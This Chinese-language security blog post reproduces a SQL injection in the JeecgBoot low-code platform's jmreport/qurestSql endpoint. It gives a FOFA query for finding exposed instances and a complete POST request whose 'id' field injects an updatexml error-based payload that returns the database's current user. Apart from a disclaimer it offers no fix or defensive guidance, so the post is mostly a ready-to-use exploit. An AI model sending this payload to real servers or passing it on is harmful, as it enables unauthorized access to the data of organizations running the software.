漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞

免责声明

本文章只用于技术交流,若使用本文章提供的技术信息进行非法操作,后果均由使用者本人负责。

漏洞描述

JeecgBoot 企业级低代码平台 qurestSql存在SQL注入漏洞。

图片[1]-漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞-安全小天地

漏洞复现

fofa-query: app=”JeecgBoot-企业级低代码平台”

1.执行poc,进行当前用户查询

POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json;charset=UTF-8
{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}


「渗透云记」公众号里主要记录我每天的所思所想,我会坚持更新质量不错的文章,感兴趣的小伙伴可以扫描下方二维码,谢谢支持! 安全小天地 - 公众号 - 渗透云记
© 版权声明
THE END
喜欢就支持一下吧
点赞14 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容